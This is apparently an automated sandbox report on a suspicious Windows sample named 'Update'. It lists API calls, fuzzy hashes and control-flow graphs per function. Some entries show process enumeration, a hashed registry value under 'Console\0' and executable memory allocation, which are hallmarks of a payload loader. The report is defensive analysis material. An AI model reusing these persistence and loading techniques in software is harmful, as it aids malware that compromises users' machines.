                                              • Instruction ID: 223202a646ff4cf84235db677e42a3dd7b4d1bc826f382de3858f14278179f7a
                                              • Opcode Fuzzy Hash: 6a20af08e643b24c3e5c3c4f0cca899dd9c4b047244e3f7bb1987883150e3d07
                                              • Instruction Fuzzy Hash: 49E15471A012359FDF24CE64CD81BEEB375BF89700F1456A9E919A7284D730BE818F91
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C1C5111
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 6C1C5148
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000002,00000000), ref: 6C1C5176
                                              • _strlen.LIBCMT ref: 6C1C518D
                                              • Process32NextW.KERNEL32(?,?), ref: 6C1C52AE
                                              • CloseHandle.KERNEL32(00000000,?,00000002,00000000), ref: 6C1C52BC
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 6C1C52D2
                                              • SHGetFolderPathA.SHELL32 ref: 6C1C532D
                                              • _strlen.LIBCMT ref: 6C1C534B
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: CloseHandleProcess32_strlen$ByteCharCreateFirstFolderMultiNextPathSnapshotToolhelp32Wide
                                              • String ID:
                                              • API String ID: 2690550405-0
                                              • Opcode ID: 0566080c19302e38227f669dbc7151bd6f82d3e6ff23a34c7cc8f0cfc055ae94
                                              • Instruction ID: f0820816d24f39527c14bd159cb0d94ae4a820a28b80ac96433885ba5f2b488d
                                              • Opcode Fuzzy Hash: 0566080c19302e38227f669dbc7151bd6f82d3e6ff23a34c7cc8f0cfc055ae94
                                              • Instruction Fuzzy Hash: C0120772F012148BDB10CF68CC907DEB7F6EF99324F254628F855A7781EB3899458B52
                                              APIs
                                              • GetFileAttributesA.KERNEL32(?), ref: 6C1C5E3E
                                              • SHGetFolderPathA.SHELL32 ref: 6C1C5E61
                                              • _strlen.LIBCMT ref: 6C1C5E7F
                                              • GetFileAttributesA.KERNEL32(?), ref: 6C1C6434
                                              • CoInitialize.OLE32(00000000), ref: 6C1C648E
                                              • CoCreateInstance.OLE32(6C348C90,00000000,00000001,6C345330,00000000), ref: 6C1C64A5
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 6C1C64D4
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000104), ref: 6C1C6570
                                              • CoUninitialize.COMBASE ref: 6C1C6594
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: AttributesByteCharFileMultiWide$CreateFolderInitializeInstancePathUninitialize_strlen
                                              • String ID:
                                              • API String ID: 1074249417-0
                                              • Opcode ID: b33c1b09cceebc464c9d5b511581cd68922f105db02675a8fe79e9ef2da990d4
                                              • Instruction ID: db6df2b51be5ddb02f8d23b4fe97548fcd1c0511de6cc1c0af327bc3add35f9b
                                              • Opcode Fuzzy Hash: b33c1b09cceebc464c9d5b511581cd68922f105db02675a8fe79e9ef2da990d4
                                              • Instruction Fuzzy Hash: 6E52C2B1E002188FDB14CF68CC947EEBBB5FF59318F144269E519E7780EB3899858B52
                                              APIs
                                              • _memset.LIBCMT ref: 0432607C
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 04326088
                                              • Process32FirstW.KERNEL32(00000000,00000000), ref: 043260B9
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0432610F
                                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 04326116
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                              • String ID:
                                              • API String ID: 2526126748-0
                                              • Opcode ID: 341b104eea3e70e7e80d9767d751aa45225d6c0c3b52bee31a76179892b00277
                                              • Instruction ID: 617d3eb3c940a62ac7c42cc6227b3d1be1f75bd4645adf5b5ec2d619d72fd2c5
                                              • Opcode Fuzzy Hash: 341b104eea3e70e7e80d9767d751aa45225d6c0c3b52bee31a76179892b00277
                                              • Instruction Fuzzy Hash: 4C21A631604134ABDB20EF64DD56BFA7379EF58714F005299ED1A96180EF35BA04D650
                                              APIs
                                              • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 04323043
                                              • recv.WS2_32(?,?,00040000,00000000), ref: 04323064
                                                • Part of subcall function 0432F91B: __getptd_noexit.LIBCMT ref: 0432F91B
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3550596047.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: true
                                              • Associated: 00000003.00000002.3550596047.0000000004354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4320000_Update.jbxd
                                              Similarity
                                              • API ID: __getptd_noexitrecvselect
                                              • String ID:
                                              • API String ID: 4248608111-0
                                              • Opcode ID: 71ab5a3c916bd0fa6b22f0c55e67d6fb60d72f4a012469e970627d7ec564b169
                                              • Instruction ID: a82822f15e69f66b34744ac22298b4619ddfb8aa5976325a584a65d00ac6c6c6
                                              • Opcode Fuzzy Hash: 71ab5a3c916bd0fa6b22f0c55e67d6fb60d72f4a012469e970627d7ec564b169
                                              • Instruction Fuzzy Hash: E721F670600228AFEB20EF79DE85B9B73B4EF04714F0495A5E9056B180D774BD84CBB1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 820 6c1e7c58-6c1e7cae call 6c1e8a44 call 6c1cd1dc GetDeviceCaps 825 6c1e7cc6-6c1e7cce 820->825 826 6c1e7cb0-6c1e7cbc 820->826 828 6c1e7ce4-6c1e7cec 825->828 829 6c1e7cd0-6c1e7cd4 825->829 826->825 827 6c1e7cbe 826->827 827->825 831 6c1e7cee-6c1e7cf2 828->831 832 6c1e7d02-6c1e7d0a 828->832 829->828 830 6c1e7cd6-6c1e7cde call 6c1cc4d4 DeleteObject 829->830 830->828 831->832 834 6c1e7cf4-6c1e7cfc call 6c1cc4d4 DeleteObject 831->834 835 6c1e7d0c-6c1e7d10 832->835 836 6c1e7d20-6c1e7d28 832->836 834->832 835->836 839 6c1e7d12-6c1e7d1a call 6c1cc4d4 DeleteObject 835->839 840 6c1e7d3e-6c1e7d46 836->840 841 6c1e7d2a-6c1e7d2e 836->841 839->836 842 6c1e7d5c-6c1e7d64 840->842 843 6c1e7d48-6c1e7d4c 840->843 841->840 846 6c1e7d30-6c1e7d38 call 6c1cc4d4 DeleteObject 841->846 849 6c1e7d7a-6c1e7d82 842->849 850 6c1e7d66-6c1e7d6a 842->850 843->842 848 6c1e7d4e-6c1e7d56 call 6c1cc4d4 DeleteObject 843->848 846->840 848->842 855 6c1e7d98-6c1e7da0 849->855 856 6c1e7d84-6c1e7d88 849->856 850->849 854 6c1e7d6c-6c1e7d74 call 6c1cc4d4 DeleteObject 850->854 854->849 857 6c1e7db6-6c1e7dbe 855->857 858 6c1e7da2-6c1e7da6 855->858 856->855 861 6c1e7d8a-6c1e7d92 call 6c1cc4d4 DeleteObject 856->861 863 6c1e7dd4-6c1e7ddc 857->863 864 6c1e7dc0-6c1e7dc4 857->864 858->857 862 6c1e7da8-6c1e7db0 call 6c1cc4d4 DeleteObject 858->862 861->855 862->857 870 6c1e7dde-6c1e7de2 863->870 871 6c1e7df2-6c1e7e4f call 6c1e8709 call 6c30d9f0 GetTextCharsetInfo 863->871 864->863 869 6c1e7dc6-6c1e7dce call 6c1cc4d4 DeleteObject 864->869 869->863 870->871 875 6c1e7de4-6c1e7dec call 6c1cc4d4 DeleteObject 870->875 882 6c1e7e56-6c1e7e5a 871->882 883 6c1e7e51-6c1e7e54 871->883 875->871 884 6c1e7e5d-6c1e7e83 lstrcpyW 882->884 885 6c1e7e5c 882->885 883->884 886 6c1e7e85-6c1e7e8c 884->886 887 6c1e7ef1-6c1e7f32 CreateFontIndirectW call 6c1cc4a8 call 6c31d632 884->887 885->884 886->887 889 6c1e7e8e-6c1e7ea8 EnumFontFamiliesW 886->889 898 6c1e7f39-6c1e803f CreateFontIndirectW call 6c1cc4a8 call 6c1e8709 CreateFontIndirectW call 6c1cc4a8 CreateFontIndirectW call 6c1cc4a8 CreateFontIndirectW call 6c1cc4a8 GetSystemMetrics lstrcpyW CreateFontIndirectW call 6c1cc4a8 GetStockObject 887->898 899 6c1e7f34-6c1e7f36 887->899 891 6c1e7ebf-6c1e7edc EnumFontFamiliesW 889->891 892 6c1e7eaa-6c1e7ebd lstrcpyW 889->892 894 6c1e7ede-6c1e7ee3 891->894 895 6c1e7ee5 891->895 892->887 897 6c1e7eea-6c1e7eeb lstrcpyW 894->897 895->897 897->887 912 6c1e810f-6c1e811c call 6c1e874a 898->912 913 6c1e8045-6c1e8054 GetObjectW 898->913 899->898 919 6c1e8147-6c1e8149 912->919 913->912 914 6c1e805a-6c1e810a lstrcpyW CreateFontIndirectW call 6c1cc4a8 CreateFontIndirectW call 6c1cc4a8 GetObjectW CreateFontIndirectW call 6c1cc4a8 CreateFontIndirectW call 6c1cc4a8 913->914 914->912 921 6c1e811e-6c1e8125 919->921 922 6c1e814b-6c1e815b call 6c1c7f12 919->922 923 6c1e8127-6c1e8131 call 6c1d4029 921->923 924 6c1e8171-6c1e8176 call 6c1e0b00 921->924 930 6c1e8160-6c1e8170 call 6c1cd231 call 6c1e8ac7 922->930 923->919 935 6c1e8133-6c1e8143 923->935 935->919
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C1E7C62
                                                • Part of subcall function 6C1CD1DC: __EH_prolog3.LIBCMT ref: 6C1CD1E3
                                                • Part of subcall function 6C1CD1DC: GetWindowDC.USER32(00000000,00000004,6C1E78A0,00000000), ref: 6C1CD20F
                                              • GetDeviceCaps.GDI32(?,00000058), ref: 6C1E7C82
                                              • DeleteObject.GDI32(00000000), ref: 6C1E7CDE
                                              • DeleteObject.GDI32(00000000), ref: 6C1E7CFC
                                              • DeleteObject.GDI32(00000000), ref: 6C1E7D1A
                                              • DeleteObject.GDI32(00000000), ref: 6C1E7D38
                                              • DeleteObject.GDI32(00000000), ref: 6C1E7D56
                                              • DeleteObject.GDI32(00000000), ref: 6C1E7D74
                                              • DeleteObject.GDI32(00000000), ref: 6C1E7D92
                                              • DeleteObject.GDI32(00000000), ref: 6C1E7DB0
                                              • DeleteObject.GDI32(00000000), ref: 6C1E7DCE
                                              • DeleteObject.GDI32(00000000), ref: 6C1E7DEC
                                              • GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 6C1E7E24
                                              • lstrcpyW.KERNEL32(?,?), ref: 6C1E7E79
                                              • EnumFontFamiliesW.GDI32(?,00000000,6C1E8905,Segoe UI), ref: 6C1E7EA0
                                              • lstrcpyW.KERNEL32(?,Segoe UI), ref: 6C1E7EB3
                                              • EnumFontFamiliesW.GDI32(?,00000000,6C1E8905,Tahoma), ref: 6C1E7ED1
                                              • lstrcpyW.KERNEL32(?,MS Sans Serif), ref: 6C1E7EEB
                                              • CreateFontIndirectW.GDI32(?), ref: 6C1E7EF5
                                              • CreateFontIndirectW.GDI32(?), ref: 6C1E7F3D
                                              • CreateFontIndirectW.GDI32(?), ref: 6C1E7F7C
                                              • CreateFontIndirectW.GDI32(?), ref: 6C1E7FA8
                                              • CreateFontIndirectW.GDI32(?), ref: 6C1E7FC9
                                              • GetSystemMetrics.USER32(00000048), ref: 6C1E7FE8
                                              • lstrcpyW.KERNEL32(?,Marlett), ref: 6C1E7FFB
                                              • CreateFontIndirectW.GDI32(?), ref: 6C1E8005
                                              • GetStockObject.GDI32(00000011), ref: 6C1E8031
                                              • GetObjectW.GDI32(00000000,0000005C,?), ref: 6C1E804C
                                              • lstrcpyW.KERNEL32(?,Arial), ref: 6C1E808D
                                              • CreateFontIndirectW.GDI32(?), ref: 6C1E8097
                                              • CreateFontIndirectW.GDI32(?), ref: 6C1E80B0
                                              • GetObjectW.GDI32(?,0000005C,?), ref: 6C1E80CE
                                              • CreateFontIndirectW.GDI32(?), ref: 6C1E80DC
                                              • CreateFontIndirectW.GDI32(?), ref: 6C1E80FD
                                                • Part of subcall function 6C1E874A: __EH_prolog3_GS.LIBCMT ref: 6C1E8751
                                                • Part of subcall function 6C1E874A: GetTextMetricsW.GDI32(?,?), ref: 6C1E8786
                                                • Part of subcall function 6C1E874A: GetTextMetricsW.GDI32(?,?), ref: 6C1E87C6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_$CapsCharsetDeviceH_prolog3InfoStockSystemWindow
                                              • String ID: Arial$D}4l$MS Sans Serif$Marlett$Segoe UI$Tahoma
                                              • API String ID: 2837096512-749692918
                                              • Opcode ID: ba4f139090c80045c7a232696f6aee4e735591f61214ac938b85635cef9d99ae
                                              • Instruction ID: 2c727bdcb2a181e281703be4d9723688c00eb700635c0927ad8ca1f62cb65d0a
                                              • Opcode Fuzzy Hash: ba4f139090c80045c7a232696f6aee4e735591f61214ac938b85635cef9d99ae
                                              • Instruction Fuzzy Hash: CDE17E70A017489FEF11DBB4C858BEEB7BDAF1A308F00855AE41AE7681EB389545CF51

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2140 6c1e783a-6c1e7859 call 6c1e89db GetSysColor 2143 6c1e786a 2140->2143 2144 6c1e785b-6c1e7865 GetSysColor 2140->2144 2146 6c1e786c-6c1e787c GetSysColor 2143->2146 2144->2143 2145 6c1e7867-6c1e7868 2144->2145 2145->2146 2147 6c1e787e-6c1e7888 GetSysColor 2146->2147 2148 6c1e788f 2146->2148 2147->2148 2149 6c1e788a-6c1e788d 2147->2149 2150 6c1e7891-6c1e79c8 call 6c1cd1dc GetDeviceCaps GetSysColor * 21 2148->2150 2149->2150 2153 6c1e79ca-6c1e79d1 2150->2153 2154 6c1e79d3-6c1e79df GetSysColor 2150->2154 2155 6c1e79e5-6c1e79fb GetSysColorBrush 2153->2155 2154->2155 2156 6c1e7c52-6c1e7c57 call 6c1e0b00 2155->2156 2157 6c1e7a01-6c1e7a0e GetSysColorBrush 2155->2157 2157->2156 2158 6c1e7a14-6c1e7a21 GetSysColorBrush 2157->2158 2158->2156 2160 6c1e7a27-6c1e7b72 call 6c1cc4fe CreateSolidBrush call 6c1cc4a8 call 6c1cc4fe CreateSolidBrush call 6c1cc4a8 call 6c1cc4fe CreateSolidBrush call 6c1cc4a8 call 6c1cc4fe CreateSolidBrush call 6c1cc4a8 call 6c1cc4fe CreateSolidBrush call 6c1cc4a8 call 6c1cc4fe CreateSolidBrush call 6c1cc4a8 call 6c1cc4fe CreateSolidBrush call 6c1cc4a8 call 6c1cc4fe CreatePen call 6c1cc4a8 call 6c1cc4fe CreatePen call 6c1cc4a8 call 6c1cc4fe CreatePen call 6c1cc4a8 2158->2160 2202 6c1e7b74-6c1e7b78 2160->2202 2203 6c1e7b81-6c1e7b88 2160->2203 2202->2203 2204 6c1e7b7a-6c1e7b7c call 6c1cc4fe 2202->2204 2205 6c1e7bee-6c1e7bfa call 6c1e8808 2203->2205 2206 6c1e7b8a-6c1e7bec CreateSolidBrush call 6c1cc4a8 2203->2206 2204->2203 2205->2156 2213 6c1e7bfc-6c1e7c30 call 6c1cc4a8 CreatePatternBrush call 6c1cc4a8 call 6c1c7f12 2205->2213 2212 6c1e7c35-6c1e7c51 call 6c21b409 call 6c1cd231 call 6c1e8ab3 2206->2212 2213->2212
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C1E7841
                                              • GetSysColor.USER32(00000016), ref: 6C1E784A
                                              • GetSysColor.USER32(0000000F), ref: 6C1E785D
                                              • GetSysColor.USER32(00000015), ref: 6C1E7874
                                              • GetSysColor.USER32(0000000F), ref: 6C1E7880
                                              • GetDeviceCaps.GDI32(?,0000000C), ref: 6C1E78A8
                                              • GetSysColor.USER32(0000000F), ref: 6C1E78B6
                                              • GetSysColor.USER32(00000010), ref: 6C1E78C4
                                              • GetSysColor.USER32(00000015), ref: 6C1E78D2
                                              • GetSysColor.USER32(00000016), ref: 6C1E78E0
                                              • GetSysColor.USER32(00000014), ref: 6C1E78EE
                                              • GetSysColor.USER32(00000012), ref: 6C1E78FC
                                              • GetSysColor.USER32(00000011), ref: 6C1E790A
                                              • GetSysColor.USER32(00000006), ref: 6C1E7915
                                              • GetSysColor.USER32(0000000D), ref: 6C1E7920
                                              • GetSysColor.USER32(0000000E), ref: 6C1E792B
                                              • GetSysColor.USER32(00000005), ref: 6C1E7936
                                              • GetSysColor.USER32(00000008), ref: 6C1E7944
                                              • GetSysColor.USER32(00000009), ref: 6C1E794F
                                              • GetSysColor.USER32(00000007), ref: 6C1E795A
                                              • GetSysColor.USER32(00000002), ref: 6C1E7965
                                              • GetSysColor.USER32(00000003), ref: 6C1E7970
                                              • GetSysColor.USER32(0000001B), ref: 6C1E797E
                                              • GetSysColor.USER32(0000001C), ref: 6C1E798C
                                              • GetSysColor.USER32(0000000A), ref: 6C1E799A
                                              • GetSysColor.USER32(0000000B), ref: 6C1E79A8
                                              • GetSysColor.USER32(00000013), ref: 6C1E79B6
                                              • GetSysColor.USER32(0000001A), ref: 6C1E79DF
                                              • GetSysColorBrush.USER32(00000010), ref: 6C1E79F0
                                              • GetSysColorBrush.USER32(00000014), ref: 6C1E7A03
                                              • GetSysColorBrush.USER32(00000005), ref: 6C1E7A16
                                              • CreateSolidBrush.GDI32(?), ref: 6C1E7A37
                                              • CreateSolidBrush.GDI32(?), ref: 6C1E7A55
                                              • CreateSolidBrush.GDI32(?), ref: 6C1E7A73
                                              • CreateSolidBrush.GDI32(?), ref: 6C1E7A94
                                              • CreateSolidBrush.GDI32(?), ref: 6C1E7AB2
                                              • CreateSolidBrush.GDI32(?), ref: 6C1E7AD0
                                              • CreateSolidBrush.GDI32(?), ref: 6C1E7AEE
                                              • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C1E7B14
                                              • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C1E7B38
                                              • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C1E7B5C
                                              • CreateSolidBrush.GDI32(?), ref: 6C1E7BDA
                                              • CreatePatternBrush.GDI32(00000000), ref: 6C1E7C18
                                                • Part of subcall function 6C1CC4FE: DeleteObject.GDI32(00000000), ref: 6C1CC50D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
                                              • String ID:
                                              • API String ID: 3754413814-0
                                              • Opcode ID: 619716b0a0587b94b8dfeb679a392df105a1f15db75028f785b286f5508f3cd0
                                              • Instruction ID: 864832533e13ea67557faa03ec970468957586f538703fbdc8f2cdcf4ddcf34b
                                              • Opcode Fuzzy Hash: 619716b0a0587b94b8dfeb679a392df105a1f15db75028f785b286f5508f3cd0
                                              • Instruction Fuzzy Hash: C5C1D670B02B06AFEB05AFB488187DCBBB5BF1A701F044119E616D7A80CBB89565DBD1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2401 100054c0-100054d6 2402 100054dc-100054e1 2401->2402 2403 1000580e-10005813 2401->2403 2404 10005707-1000575f VirtualAlloc call 1000c880 call 100067ff 2402->2404 2405 100054e7-1000550f RegOpenKeyExW 2402->2405 2426 10005761-100057a1 call 1000c880 RegCreateKeyW 2404->2426 2427 100057dd-100057ec 2404->2427 2406 10005515-10005538 RegQueryValueExW 2405->2406 2407 100055ba-100055bf 2405->2407 2409 1000553a-10005567 call 100067ff call 1000c800 RegQueryValueExW 2406->2409 2410 100055ad-100055b7 RegCloseKey 2406->2410 2412 100055c2-100055c8 2407->2412 2435 10005569-100055a8 VirtualAlloc call 1000c880 2409->2435 2436 100055aa 2409->2436 2410->2407 2415 100055e8-100055ea 2412->2415 2416 100055ca-100055cd 2412->2416 2419 100055ed-100055ef 2415->2419 2417 100055e4-100055e6 2416->2417 2418 100055cf-100055d7 2416->2418 2417->2419 2418->2415 2422 100055d9-100055e2 2418->2422 2423 100055f5-100055fc 2419->2423 2424 100056f8-10005702 2419->2424 2422->2412 2422->2417 2429 10005611-100056d4 call 1000c800 * 3 call 100067ff call 1000c880 2423->2429 2430 100055fe-1000560b VirtualFree 2423->2430 2428 100057ee-1000580b call 1000721b Sleep call 10002d10 2424->2428 2438 100057a3-100057c4 RegDeleteValueW RegSetValueExW 2426->2438 2439 100057ca-100057d5 RegCloseKey call 100072bb 2426->2439 2427->2428 2447 1000580d 2428->2447 2455 100056e6-100056f5 call 1000680a 2429->2455 2456 100056d6-100056e3 2429->2456 2430->2429 2435->2436 2436->2410 2438->2439 2446 100057da 2439->2446 2446->2427 2447->2403 2460 100056e4 call 100060df 2456->2460 2461 100056e4 call 100031ef 2456->2461 2460->2455 2461->2455
                                              APIs
                                              • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 10005507
                                              • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 1000552E
                                              • _memset.LIBCMT ref: 10005548
                                              • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 10005563
                                              • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005586
                                              • RegCloseKey.ADVAPI32(?), ref: 100055B1
                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 10005605
                                              • _memset.LIBCMT ref: 10005669
                                              • _memset.LIBCMT ref: 1000568D
                                              • _memset.LIBCMT ref: 1000569F
                                              • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005726
                                              • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 10005799
                                              • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 100057AC
                                              • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 100057C4
                                              • RegCloseKey.KERNEL32(?), ref: 100057CE
                                              • Sleep.KERNEL32(00000BB8), ref: 100057FE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551303488.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000003.00000002.3551255249.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551324667.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551342209.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551359349.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.3551377013.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                              Similarity
                                              • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                              • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                              • API String ID: 354323817-737951744
                                              • Opcode ID: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
                                              • Instruction ID: 005816a77294032e0ea7aedf6318117014c310f5a4f2017eaf50af4860f80873
                                              • Opcode Fuzzy Hash: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
                                              • Instruction Fuzzy Hash: 5891D475A00718ABF710CF60CC84FAB77BAFB88741F508158FA089B245DB75EA40CB51

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2735 4329e50-4329e85 GdipGetImagePixelFormat 2736 4329e87 2735->2736 2737 4329e8a-4329eb1 2735->2737 2736->2737 2738 4329eb3-4329ec3 2737->2738 2739 4329ec9-4329ecf 2737->2739 2738->2739 2740 4329ed1-4329ee1 2739->2740 2741 4329eeb-4329f04 GdipGetImageHeight 2739->2741 2740->2741 2742 4329f06 2741->2742 2743 4329f09-4329f2c GdipGetImageWidth 2741->2743 2742->2743 2744 4329f31-4329f4e call 4329c30 2743->2744 2745 4329f2e 2743->2745 2748 4329f54-4329f68 2744->2748 2749 432a055-432a05a 2744->2749 2745->2744 2750 4329f6e-4329f87 GdipGetImagePaletteSize 2748->2750 2751 432a0cf-432a0d7 2748->2751 2752 432a2a4-432a2ba call 432f00a 2749->2752 2756 4329f89 2750->2756 2757 4329f8c-4329f98 2750->2757 2754 432a20a-432a27b GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext GdipDrawImageI GdipDeleteGraphics GdipDisposeImage 2751->2754 2755 432a0dd-432a11a GdipBitmapLockBits 2751->2755 2761 432a281-432a283 2754->2761 2759 432a14a-432a177 2755->2759 2760 432a11c-432a121 2755->2760 2756->2757 2762 4329fb2-4329fba 2757->2762 2763 4329f9a-4329fa5 call 4329650 2757->2763 2770 432a179-432a18e call 43307f2 2759->2770 2771 432a1bf-432a1de GdipBitmapUnlockBits 2759->2771 2766 432a123 2760->2766 2767 432a140-432a145 2760->2767 2768 432a2a2 2761->2768 2769 432a285 2761->2769 2764 4329fd0-4329fd5 call 4321280 2762->2764 2765 4329fbc-4329fca call 